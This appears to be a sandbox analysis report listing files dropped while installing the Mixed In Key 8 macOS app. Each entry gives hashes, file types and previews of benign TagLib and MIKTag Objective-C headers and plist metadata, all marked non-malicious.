                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):2192
                                                                                                    Entropy (8bit):4.127547095235431
                                                                                                    Encrypted:false
                                                                                                    MD5:AD85CCF53957F05ACFE7C52DD24A8F11
                                                                                                    SHA1:A0D628BF97B5475A5C2CA5204EAD8B69410FB60E
                                                                                                    SHA-256:6C8F6578CA0A6ADF925B579FDC5D83B86E46852C4E6440A2EAFADCC137E654DA
                                                                                                    SHA-512:FA99C499DD6E65CB4D0ABDC57AC64BFB2ECF400E0017923937E8C4F9F2DF2BCDF84DA79412CB031E687BC668739E1788D809D408DC8AB76D65771897CAEE902C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2016 by Tsuda Kageyu. email : tsuda.kageyu@gmail.com. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/PrivateHeaders/.BC.T_smBfZy
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C program text
                                                                                                    Size (bytes):1064
                                                                                                    Entropy (8bit):5.20229960529526
                                                                                                    Encrypted:false
                                                                                                    MD5:460EB345234433774257552CFA8E1B93
                                                                                                    SHA1:6B6C155710EBA5D4D3BBFE2EF6A0AEBC3B5C2D9C
                                                                                                    SHA-256:A4F6A0EB9563BAE4DD8F5DEE0A4D9A6DC99343CB0BBE075444061104B083CD52
                                                                                                    SHA-512:BC18D60445D72C5530DDBF3DB1ADB3B708A8DA138CF25734B037DD2B57FB6108997F7A1647F2737688299ECAF0D78293665FB058347BDDDF39386BFB3CB038A6
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /* config.h. Generated by cmake from config.h.cmake */../* Defined if your compiler supports some byte swap functions */./* #undef HAVE_BOOST_BYTESWAP */.#define HAVE_GCC_BYTESWAP 1./* #undef HAVE_GLIBC_BYTESWAP */./* #undef HAVE_MSC_BYTESWAP */./* #undef HAVE_MAC_BYTESWAP */./* #undef HAVE_OPENBSD_BYTESWAP */../* Defined if your compiler supports some atomic operations */./* #undef HAVE_STD_ATOMIC */./* #undef HAVE_BOOST_ATOMIC */.#define HAVE_GCC_ATOMIC 1./* #undef HAVE_MAC_ATOMIC */./* #undef HAVE_WIN_ATOMIC */./* #undef HAVE_IA64_ATOMIC */../* Defined if your compiler supports some safer version of vsprintf */.#define HAVE_VSNPRINTF 1./* #undef HAVE_VSPRINTF_S */../* Defined if your compiler supports ISO _strdup */./* #undef HAVE_ISO_STRDUP */../* Defined if zlib is installed */.#define HAVE_ZLIB 1./* #undef HAVE_BOOST_ZLIB */../* Indicates whether debug messages are shown even in release mode */./* #undef TRACE_IN_RELEASE */..#define TESTS_DIR "/Users/patrickmachielse/Docu
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Resources/.BC.T_RDa8Ms
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):1166
                                                                                                    Entropy (8bit):5.195791133189862
                                                                                                    Encrypted:false
                                                                                                    MD5:12EB6F62A5126169941BAC363014B655
                                                                                                    SHA1:4F4974B27426AB26F491C72D7E020AD51B677419
                                                                                                    SHA-256:587BE47AB79E73075387BFB6512A62A202B405BFF47FFC6E9D01BEAC0CB3EB94
                                                                                                    SHA-512:CD99C3EBEF3ADFAAB411B66DFE2B8950B708B2284CF1A2D74B178046DA0678525A838A0781914DFC57E8A280CE57669FC2E9A750B768D27795372660D68E06FD
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>BuildMachineOSBuild</key>..<string>18G95</string>..<key>CFBundleDevelopmentRegion</key>..<string>English</string>..<key>CFBundleExecutable</key>..<string>TagLib</string>..<key>CFBundleIdentifier</key>..<string>com.mixedinkey.TagLib</string>..<key>CFBundleInfoDictionaryVersion</key>..<string>6.0</string>..<key>CFBundleName</key>..<string>TagLib</string>..<key>CFBundlePackageType</key>..<string>FMWK</string>..<key>CFBundleSignature</key>..<string>????</string>..<key>CFBundleSupportedPlatforms</key>..<array>...<string>MacOSX</string>..</array>..<key>CFBundleVersion</key>..<string>1.9.1</string>..<key>DTCompiler</key>..<string>com.apple.compilers.llvm.clang.1_0</string>..<key>DTPlatformBuild</key>..<string>9F2000</string>..<key>DTPlatformVersion</key>..<string>GM</string>..<key>DTSDKBuild</key>..<string>17E189</stri
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/_CodeSignature/.BC.T_dUy3dV
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):26459
                                                                                                    Entropy (8bit):5.253903856887356
                                                                                                    Encrypted:false
                                                                                                    MD5:94C0D2157BEDD54BF3ED931EA2CCC128
                                                                                                    SHA1:AACA8AD206F4F20C7BD4612CD4EF73836FA015B8
                                                                                                    SHA-256:41FED2657695021A398FC51E5FFC9EAF4CDF9B46CC508A328BF46B3776439546
                                                                                                    SHA-512:29F01E530246061B0D44B8EB59A9C84D0C156B76F86A0F6378A8001314B267D25E49AFC112A15E24F271EC3807485691AA8183A6D9F8A48C0ADB479F1F055A7B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>files</key>..<dict>...<key>Resources/Info.plist</key>...<data>...T0l0snQmqyb0kcctfgIK1RtndBk=...</data>..</dict>..<key>files2</key>..<dict>...<key>Headers/aifffile.h</key>...<dict>....<key>hash</key>....<data>....ZD2XK2XyK6VP9YH7rZghXDaB3Zo=....</data>....<key>hash2</key>....<data>....LgqAi83+AGd16+LbSbnXIQQhe90Y75F3LzHVXLfQKt0=....</data>...</dict>...<key>Headers/aiffproperties.h</key>...<dict>....<key>hash</key>....<data>....a1znPKP99iZ4PVtVCGdv0haRtJI=....</data>....<key>hash2</key>....<data>....kXrWK9gKkxHDRNofF1AQG5yxMxoFuSLJakK/s2gbziM=....</data>...</dict>...<key>Headers/apefile.h</key>...<dict>....<key>hash</key>....<data>....6uayiA7AeTPFnjm/8l2pFyIkkeQ=....</data>....<key>hash2</key>....<data>....TXb7nMKT6R/4WldamwUdkwaOOE4XGtDH4Y8MUyGipXE=....</data>...</dict>...<key>Headers/apefooter.h</key>...<dict>.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_3B76ri
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Lisp/Scheme program text
                                                                                                    Size (bytes):5973
                                                                                                    Entropy (8bit):5.239207130854761
                                                                                                    Encrypted:false
                                                                                                    MD5:AF248B3E06FD13C764DFE0AC742D27E7
                                                                                                    SHA1:B4061D7895E30D89A26E8BC7139096AA83B5C93A
                                                                                                    SHA-256:BF54B126C011C90E16B97E250C5D7334EDEAC2549E73F6595B157725091B64C8
                                                                                                    SHA-512:E58066D63532B77A445485BBB7FAFD77774CBC8E332CE2B99F7E44D96766E9C692CDE8479C2B0B882667D4E396184D3B2319A886836C8C3988B5733D1C84FEE4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKTag.h.// MixedInKey.//.// Created by patrickm on 21-01-10..// Copyright 2010 Mixed In Key LLC. All rights reserved..//..#import <Foundation/Foundation.h>.#import "MIKTagCustomProperties.h".#import "MIKTagErrors.h"..NS_ASSUME_NONNULL_BEGIN../*!..@header..MIKTag..@abstract .Abstract class offering ID3 and MP4 tag support...@discussion.Tag handling based on TagLib. Only a minimal wrapper......For writing use init/release because changes are only.....fflushed when the underlying tfile(s) are destroyed.. */..//.Tags implemented using TagLib 1.10+.//.http://developer.kde.org/~wheeler/taglib/api/.//..//.type for block based save API.typedef void (^MIKTagCompletionBlock)(BOOL success, NSError * _Nullable error);...//Keys for accessing the returned NSDictionaries in the -(NSArray *)images method.extern NSString * const MIKTagImageDictionaryImageKey;.extern NSString * const MIKTagImageDictionaryImageTypeKey;..@class MIKTagComment;.@class MIKTagSeratoCuePoint;.@class MIKTagTraktorCu
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_4YJ6Xa
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):338
                                                                                                    Entropy (8bit):4.985513256272894
                                                                                                    Encrypted:false
                                                                                                    MD5:CC4CF75DA87277F9D1B1CDD60B56D1FB
                                                                                                    SHA1:0C3B645BBE871C73BDAB31E90878BAFED076C445
                                                                                                    SHA-256:9C5A2EE92B5EAF75A1B157EFF5FFA57E78B1F4160353E328E9C20328F6AE2E75
                                                                                                    SHA-512:1E355D19FD27F55D17ADA37E780245B942FED2A30F9D28A8984EE3EA00E474070C34616D62AC5890754E232C9BB2177A50D8310101AB401E5405AA043DD1DD1A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKTagMP4.h.// MixedInKey.//.// Created by patrickm on 21-01-10..// Copyright 2010 Mixed In Key LLC. All rights reserved..//..#import "MIKTag.h"../*!..@header..MIKTagMP4..@abstract Support for tags in m4a and mp4 files..@discussion We are relying on the similarity between m4a and mp4.. */.@interface MIKTagMP4 : MIKTag..@end.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_7GEuz9
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):971
                                                                                                    Entropy (8bit):5.1302536389002995
                                                                                                    Encrypted:false
                                                                                                    MD5:4A82AE19E2FE04D8FABB5B27DDF86B98
                                                                                                    SHA1:7AACB9CE21F37CCD6F81CDCF707A35F7745F108C
                                                                                                    SHA-256:27497080EB19588B25D10E4EED4EA2EDB096E23208353ADC6A91F39AEA338393
                                                                                                    SHA-512:0DB26746BF378D2A41590AA9A91DC3414B55D6CAA6E6392AAA673E510337EE91AC316B258BF260A7D066EE380393FDBC89561AD94D160BF99BB8E4F1A9F72D2C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKTraktorTrack.h.// MIKTag.//.// Created by Andrew Madsen on 10/8/14..// Copyright (c) 2014 mixedinkey.com. All rights reserved..//..#import <Foundation/Foundation.h>...@class MIKTraktorDatabase;.@class MIKTraktorCuePoint;..@interface MIKTraktorTrack : NSObject..@property (nonatomic, copy, readonly) NSString *uniqueID;.@property (nonatomic, strong, readonly) NSString *path;.@property (nonatomic, readonly) NSString *filename;.@property (nonatomic, strong, readonly) NSArray *cues;.@property (nonatomic, readonly) NSDate *modificationDate;.@property (nonatomic, readonly) NSArray *beatTimes;..@property (nonatomic, readonly) NSString *decomposedStringWithCanonicalMapping; /* optimization */..- (void)addCuesObject:(MIKTraktorCuePoint *)cue;.- (void)insertObject:(MIKTraktorCuePoint *)cue inCuesAtIndex:(NSUInteger)index;.- (void)removeCuesObject:(MIKTraktorCuePoint *)cue;.- (void)removeObjectFromCuesAtIndex:(NSUInteger)index;.- (void)removeAllCues;..@end.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_BZCg5q
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):2284
                                                                                                    Entropy (8bit):4.953907337583394
                                                                                                    Encrypted:false
                                                                                                    MD5:7745203F79ED739A31C0E6AB5D133DCF
                                                                                                    SHA1:E3FCEDACC13CCE846613B344B1EFBDCBFE32C053
                                                                                                    SHA-256:6329BBADC51250069AD2E3FE4A114A522A310755024A9FB442F4902308A1D22D
                                                                                                    SHA-512:EB4AE5F2F434DB7E4D23F68109421AFC92C831078B452FE05571F955EF071343D4FFADB1FCF2D07A5AC772712D1FCCE347EDD7C109349FADDFCF87CD8EFC596C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKTraktorCuePoint.h.// MIKTag.//.// Created by Andrew Madsen on 10/8/14..// Copyright (c) 2014 mixedinkey.com. All rights reserved..//..#import <Foundation/Foundation.h>..typedef NS_ENUM(NSInteger, MIKTraktorCuePointType) {..MIKTraktorCuePointTypeCue.. = 0,..MIKTraktorCuePointTypeFadeIn,..MIKTraktorCuePointTypeFadeOut,..MIKTraktorCuePointTypeLoad,..MIKTraktorCuePointTypeGrid,..MIKTraktorCuePointTypeLoop.};..@class MIKTagCuePoint;../**. .For reasons of optimization and simplicity, MIKTraktorCuePoint is immutable.. .When cuepoints need to change, create new objects and add them to MIKTraktorTrack.. . .Traktor has 8 slots for cue points. By default (?) the auto-grid cue point will occupy. .the first slot, leaving 7 emtpy slots for user cue points. However, it is possible to. .set a preference named 'Store beat marker as hot cues' to keep the grid marker hidden. .and free up the first slot, making the total number of cue point slots 8. When this. .setting is not activated the re
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_FY73l4
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):671
                                                                                                    Entropy (8bit):5.236532897403799
                                                                                                    Encrypted:false
                                                                                                    MD5:D3DD821A4E9CA34B53AE479B1C5A672C
                                                                                                    SHA1:CAF59198A8CEC7600DD39493F404CC18186FBD8A
                                                                                                    SHA-256:0F18CC17CE9BD40A79D5D6F52442841525D6CC1AF7A76CA313A7FB4131A289B6
                                                                                                    SHA-512:568BA35585C39E4F37961144AEC283F6F121AF0A8BF6657D9FD583513C2ACD0278181749CEB288750081593864EB53878F9CA93106338BA7916151F71D17BF75
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKTagComment.h.// MIKTag.//.// Created by Jake Gundersen on 4/3/13..// Copyright (c) 2013 mixedinkey.com. All rights reserved..//..#import <Foundation/Foundation.h>..NS_ASSUME_NONNULL_BEGIN..typedef NS_ENUM(NSInteger, ID3version) {. ID3TagV1,. ID3TagV2.};..@interface MIKTagComment : NSObject..@property (nonatomic, strong) NSString *comment;.@property (nonatomic, copy, nullable) NSString *originalComment;.@property (nonatomic, strong, nullable) NSString *lang;.@property (nonatomic, assign) ID3version tagVersion;.@property (nonatomic, assign) BOOL isPrimary;.@property (nonatomic, assign) BOOL v1CommentMatchesv2Comment;..@end..NS_ASSUME_NONNULL_END.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_HlQu0C
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):433
                                                                                                    Entropy (8bit):5.132424191336495
                                                                                                    Encrypted:false
                                                                                                    MD5:CE2067E9C8EEB14D316338608830E9F9
                                                                                                    SHA1:5BCF1C31F3330C564E9889406EB459F01A23C9F0
                                                                                                    SHA-256:DF1DF2DF635464A1AFAF046FC447CA1EC653EB1C9FE1519C276A906C9B16BB2F
                                                                                                    SHA-512:D95EFD7EA3F9DA284DA1ACCDF08C8E0A4831DAEB0D396F39B2975A342C5D434B932E8AA183CCB8BE103816AC913D8B71B57E01B06CA09A2329356A9FA7C82863
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKTagFLAC.h.// MIKTag.//.// Created by patrickm on 29-08-12..// Copyright (c) 2012 mixedinkey.com. All rights reserved..//..#import "MIKTagID3.h"../*!..@header..MIKTagFLAC..@abstract Support for tags in flac files..@discussion This class reads / writes Xiph and embedded ID3 (v1 and v2) tags.....If Xiph tag values take precedence when they are found......http://www.xiph.org. */.@interface MIKTagFLAC : MIKTagID3..@end.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_L4dZLQ
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):1891
                                                                                                    Entropy (8bit):5.183982005146498
                                                                                                    Encrypted:false
                                                                                                    MD5:C7688F10BDDB40D82506E7241D82C636
                                                                                                    SHA1:E19C7564D5CAA302CC38CB250D518446E2E5CC63
                                                                                                    SHA-256:375030A444B7000A4AD262EB4F720A2C408DF417F4BE87CA811808B92E026FDA
                                                                                                    SHA-512:767C865BCCB66AE4D3DD10B2F45C5081DA385F09C191D1E186DD3D0791EF67FD4D64B897C1BA981235C99AB2549AB6979396ACAEAF631583232BA6870051FD40
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKTagUtil.h.// MixedInKey.//.// Created by patrickm on 21-01-10..// Copyright 2010 Mixed In Key LLC. All rights reserved..//..#import <Foundation/Foundation.h>.../*!..@header..MIKTagUtil..@abstract Utility functions for working with m4a and id3 tags...@discussion TagLib is used to handle m4a tags as well. CoreAudio still.....doesn't support m4a at all in 10.6. Quicktime might, but the.....code is very arcane and will become obsolete.. */../*!..@function.dprintV2Tag..@abstract Print the description of an mp3 tag...@param tag A TagLib::ID3v2 tag...@discussion Uses 'void *' because of TagLib header import complications.. */.FOUNDATION_EXPORT void dprintV2Tag(void /* TagLib::ID3v2::Tag */ *tag);../*!..@function.dprintMP4Tag..@abstract.Print the description of an mp4 tag...@param..tag A TagLib::MP4 tag...@discussion.Uses 'void *' because of TagLib header import complications.. */.FOUNDATION_EXPORT void dprintMP4Tag(void /* TagLib::MP4::Tag */ *tag);../*!..@function.MIKTa
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_L4nK2I
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):1143
                                                                                                    Entropy (8bit):5.112987200807635
                                                                                                    Encrypted:false
                                                                                                    MD5:A2A2FD325B7A0EDD17C1648D5CFFEBF9
                                                                                                    SHA1:E7C38BD56AFE1555AF8B467D48CF3CC9825B26C8
                                                                                                    SHA-256:3BA336C4D8B5EC33B3353CEE8DC4580DD344BE591E01F5BF70DBE0107D3FF242
                                                                                                    SHA-512:B5C281A192E6BAFAD8F4021BE480A586285177D6FAD6244371985591B11628324DE35579ABAEA9AF4DDCB045124C0792105DDD27E43988E365DB47CB0B73435C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKTagCuePoint.h.// MIKTag.//.// Created by patrickm on 10-10-14..// Copyright (c) 2014 mixedinkey.com. All rights reserved..//..#import <Foundation/Foundation.h>.../*!..@header..MIKTagCuePoint..@abstract .Top level cue point class...@discussion.Clients use this class to get / set cue points. Cue points are the least common denominator. ....of Serato, Traktor, and RekordBox cue points, just containing time and name/label information.. */..@interface MIKTagCuePoint : NSObject <NSCopying>..+ (instancetype)cuePointWithTime:(NSTimeInterval)time name:(NSString *)name;.- (instancetype)initWithTime:(NSTimeInterval)time name:(NSString *)name;..- (BOOL)isEqualToCuePoint:(MIKTagCuePoint *)other;..@property (nonatomic, assign) NSTimeInterval time;...//.the start time of the cuepoint [seconds].@property (nonatomic, copy) NSString *name;.....//.the cue point name / label, displayed in 3rd party app.@end..#pragma mark -..@interface NSArray (MIKTagCuePoint).@property (nonatomic, readonly)
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_LLjBM9
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode C++ program text
                                                                                                    Size (bytes):399
                                                                                                    Entropy (8bit):5.106909980254568
                                                                                                    Encrypted:false
                                                                                                    MD5:D95A06BFE24AD883620128FAE44E1552
                                                                                                    SHA1:8A01DE242D3EA1889E41DE61AC416AFB7F91E32F
                                                                                                    SHA-256:1C8F0B0DA4D298B183342B148E9576ED3375BB06FC42DB45A655D4EC1F4E38B3
                                                                                                    SHA-512:7FB9D9DAB96C45DD58393FADAAD3B560014E10FA6C4BCA62120E4949BC7E5BD55D5D81228D5B48282D52DBB73878A11663C6C5D4454558C0A18A59894C9021D7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKTraktorPlaylist.h.// MIKTag.//.// Created by patrickm on 15-06-16..// Copyright .. 2016 mixedinkey.com. All rights reserved..//..#import <Foundation/Foundation.h>...@class MIKTraktorTrack;..@interface MIKTraktorPlaylist : NSObject.@property (nullable, nonatomic, readonly, copy) NSString *name;.@property (nullable, nonatomic, readonly, strong) NSArray<MIKTraktorTrack *> *tracks;.@end.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_Q6m2wK
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):1800
                                                                                                    Entropy (8bit):5.174834473064728
                                                                                                    Encrypted:false
                                                                                                    MD5:1D15D95F32C1CB1654C3B489F39B69B0
                                                                                                    SHA1:901624CF70215E2E63DA5E7791606422F136B794
                                                                                                    SHA-256:F138E5ED8FE99815552CCD89A60566C4C58D591B3598D906A99606184FC64379
                                                                                                    SHA-512:B938D54F9F57F02BDD151632601F7F49C9B2E18F21E69F1744539A1093E9C77FB6C5352AAD0F82B204E0A3325E73D8DF2188F55C270D2DBD36031CAF0A0E11E9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKRekordboxDatabase.h.// MixedInKey.//.// Created by Andrew Madsen on 10/7/14..// Copyright (c) 2014 Mixed In Key LLC. All rights reserved..//..#import <Foundation/Foundation.h>.#import <MIKTag/MIKRekordboxTrack.h>.#import <MIKTag/MIKRekordboxCuePoint.h>..@class MIKRekordboxPlaylistFolder;..extern NSString *const MIKRekordboxFileFolderSandboxedBookmarkDataKey;../**. * This class is used to read from and write to a Rekordbox XML database file.. * It is used by Mixed In Key to save cue point information generated during. * MIK analysis to Rekordbox.. */..@interface MIKRekordboxDatabase : NSObject..@property (nonatomic, strong, readonly) NSArray<MIKRekordboxTrack *> *tracks;.@property (nonatomic, strong, readonly) MIKRekordboxPlaylistFolder* playlist;.@property (nonatomic, assign, getter=isRekordboxDBLoaded) BOOL rekordboxDBLoaded;.@property (nonatomic, readonly) NSDate *fileModificationDate;.@property (nonatomic, readonly) BOOL needsReloading;..+ (instancetype)sharedDatabas
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_SApVPu
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):596
                                                                                                    Entropy (8bit):4.956889755651704
                                                                                                    Encrypted:false
                                                                                                    MD5:5D6C27DBB3438E7A6AF03220BB5F1930
                                                                                                    SHA1:B304ED02B0FA22B777A5DDBE7D6CA43F5FF8F4EE
                                                                                                    SHA-256:CBCF26A24D7A34CA42C60DE856F6C8484A8A97E21D7068CB1E5EC100710473C0
                                                                                                    SHA-512:DB4971985828624A828026275C8BF72E367D155BD7D9D1D5052B326ADE89EDBCBFBF7B2FC0EC6C3258FC7AD19AEA9A26797325DC3D7BB0B000A6A17875254489
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKTagWAV.h.// MixedInKey.//.// Created by Patrick Machielse on 24-08-11..// Copyright 2011 Mixed In Key LLC. All rights reserved..//..#import "MIKTagID3.h"../*!..@header..MIKTagWAV..@abstract Support for tags in wav files..@discussion This class reads / writes ID3v2 tags which can be stored in a RIFF chunk......If no ID3 tag is found we try to read artist, title, and comment from.....the native wav tags. There is no write support for native tags, updating.....the tag always creates an embedded ID3 tag and will not touch native tags.. */..@interface MIKTagWAV : MIKTagID3..@end.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_ZjEp5t
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode C++ program text
                                                                                                    Size (bytes):2517
                                                                                                    Entropy (8bit):5.154906345688996
                                                                                                    Encrypted:false
                                                                                                    MD5:5C5CCCD5BA6D5C05926988C6B9FC8587
                                                                                                    SHA1:0933C60C7AFDAD188FFE1C0FD69D5ACB01166EDD
                                                                                                    SHA-256:5E1BD2BC7501D039B4B593864681BBCB18D5FF537B698A7A0C0D0BF3451E6B75
                                                                                                    SHA-512:47799430AA67C4D025A62B2BDE83EBBD09610AF0FFEC4E0068AC67585E03AFBA460C2F9C1A9D3FC9B1855AF8AA854044A88E23EEBC1C12E552D14F9ADF00A256
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKTagCustomProperties.h.// MIKTag.//.// Created by patrickm on 02-05-17..// Copyright .. 2017 mixedinkey.com. All rights reserved..//..#import <Foundation/Foundation.h>.#import <MIKTag/MIKTagCuePoint.h>...@interface NSData (MIKTagData).@property (nonatomic, readonly) NSDictionary *JSONDict;.@end..#pragma mark -..@interface NSDictionary (MIKTagData).@property (nonatomic, readonly) NSData *tagData;.@end..#pragma mark -..@interface MIKTagCustomProperty : NSObject.+ (instancetype)propertyWithJSONDict:(NSDictionary *)jsonDict;.- (instancetype)initWithJSONDict:(NSDictionary *)jsonDict;.- (BOOL)isEqualToTagProperty:(MIKTagCustomProperty *)other;..@property (class, readonly) NSString *algorithmKey;.@property (class) NSInteger algorithmVersion;..@property (nonatomic, readonly) NSDictionary *JSONDict;.@property (nonatomic, readonly) NSString *source;.@property (nonatomic) NSInteger algorithm;.@end..#pragma mark -..@interface MIKTagKey : MIKTagCustomProperty..+ (instancetype)keyWithKey
